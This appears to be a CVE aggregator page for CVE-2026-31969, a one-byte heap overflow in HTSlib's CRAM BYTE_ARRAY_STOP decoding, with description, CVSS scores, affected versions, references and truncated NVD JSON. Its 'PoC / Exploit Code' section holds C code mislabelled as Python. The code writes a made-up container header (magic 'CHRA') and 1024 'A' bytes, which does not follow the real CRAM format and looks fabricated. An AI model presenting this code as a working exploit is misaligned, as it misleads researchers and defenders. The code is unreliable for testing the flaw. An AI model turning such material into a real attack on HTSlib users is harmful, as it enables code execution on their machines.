CVE-2026-31969

Description

HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. When reading data encoded using the `BYTE_ARRAY_STOP` method, an out-by-one error in the `cram_byte_array_stop_decode_char()` function check for a full output buffer could result in a single attacker-controlled byte being written beyond the end of a heap allocation. Exploiting this bug causes a heap buffer overflow. If a user opens a file crafted to exploit this issue, it could lead to the program crashing, or overwriting of data and heap structures in ways not expected by the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:* - VULNERABLE

HTSlib < 1.21.1

HTSlib < 1.22.2

HTSlib < 1.23.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-31969 PoC - Malformed CRAM file triggering heap overflow
// This PoC demonstrates the BYTE_ARRAY_STOP encoding overflow in HTSlib
// Compile: gcc -o poc poc.c -lhts

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// CRAM file structure for triggering BYTE_ARRAY_STOP overflow
typedef struct {
    uint32_t magic;          // CRAM magic number
    uint32_t version;        // CRAM version
    uint32_t file_id;        // File ID
    uint32_t data_size;      // Size of data section
    uint8_t encoding;        // BYTE_ARRAY_STOP encoding type (value: 2)
    uint8_t stop_value;      // Stop byte value
    uint16_t flags;          // Encoding flags
    uint32_t data_len;       // Length of payload data
} cram_header_t;

// Craft a malicious CRAM container with BYTE_ARRAY_STOP encoding
void create_malicious_cram(const char* filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        fprintf(stderr, "Failed to create file\n");
        return;
    }
    
    // CRAM container header
    cram_header_t header = {
        .magic = 0x43485241,  // 'CHRA'
        .version = 0x00000300,
        .file_id = 1,
        .data_size = 1024,
        .encoding = 2,  // BYTE_ARRAY_STOP encoding
        .stop_value = 0x00,
        .flags = 0x0001,
        .data_len = 512
    };
    
    fwrite(&header, sizeof(header), 1, fp);
    
    // Crafted data that triggers out-by-one error
    // Fill data to exactly fill buffer, then one more byte to overflow
    uint8_t *payload = malloc(1024);
    memset(payload, 'A', 1024);
    
    // Write payload that will cause buffer overflow when decoded
    fwrite(payload, 1024, 1, fp);
    
    free(payload);
    fclose(fp);
    printf("Malicious CRAM file created: %s\n", filename);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <output_cram_file>\n", argv[0]);
        return 1;
    }
    
    create_malicious_cram(argv[1]);
    printf("PoC generated. Use with vulnerable HTSlib version.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31969
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31969
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31969/
[4] VulDB https://vuldb.com/cve/CVE-2026-31969
[5] https://github.com/samtools/htslib/commit/88cdf69e4b83bb550ab4f6f7134892c2ad1978f4
[6] https://github.com/samtools/htslib/security/advisories/GHSA-q4cj-f4h5-fqgc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31969", "sourceIdentifier": "[email protected]", "published": "2026-03-18T20:16:21.743", "lastModified": "2026-03-19T13:59:56.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. When reading data encoded using the `BYTE_ARRAY_STOP` method, an out-by-one error in the `cram_byte_array_stop_decode_char()` function check for a full output buffer could result in a single attacker-controlled byte being written beyond the end of a heap allocation. Exploiting this bug causes a heap buffer overflow. If a user opens a file crafted to exploit this issue, it could lead to the program crashing, or overwriting of data and heap structures in ways not expected by the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "HTSlib es una biblioteca para leer y escribir formatos de archivo bioinformáticos. CRAM es un formato comprimido que almacena datos de alineación de secuencias de ADN utilizando una variedad de codificaciones y métodos de compresión. Al leer datos codificados usando el método 'BYTE_ARRAY_STOP', un error de uno de más en la comprobación de la función 'cram_byte_array_stop_decode_char()' para un búfer de salida lleno podría resultar en que un solo byte controlado por el atacante se escriba más allá del final de una asignación de memoria dinámica. Explotar este error causa un desbordamiento de búfer de heap. Si un usuario abre un archivo diseñado para explotar este problema, podría llevar a que el programa falle, o a la sobrescritura de datos y estructuras de heap de maneras no esperadas por el programa. Podría ser posible usar esto para obtener ejecución de código arbitrario. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.21.1", "matchCriteriaId": "A069D6B6-FFF6-4DB7-9811-A568ECC4B288"}, {"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.22", "versionEndExcluding": "1.22.2", "matchCriteriaId": "D9D525C8-C8AD-4368-A396-EB4D9DA02B1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:1.23:*:*:*:*:*:*:*", "matchCriteriaId": "AAA6BBB2-76F3-4372-9BAE-FDE157401EFD"}]}]}], "references": [{"url": "http ... (truncated)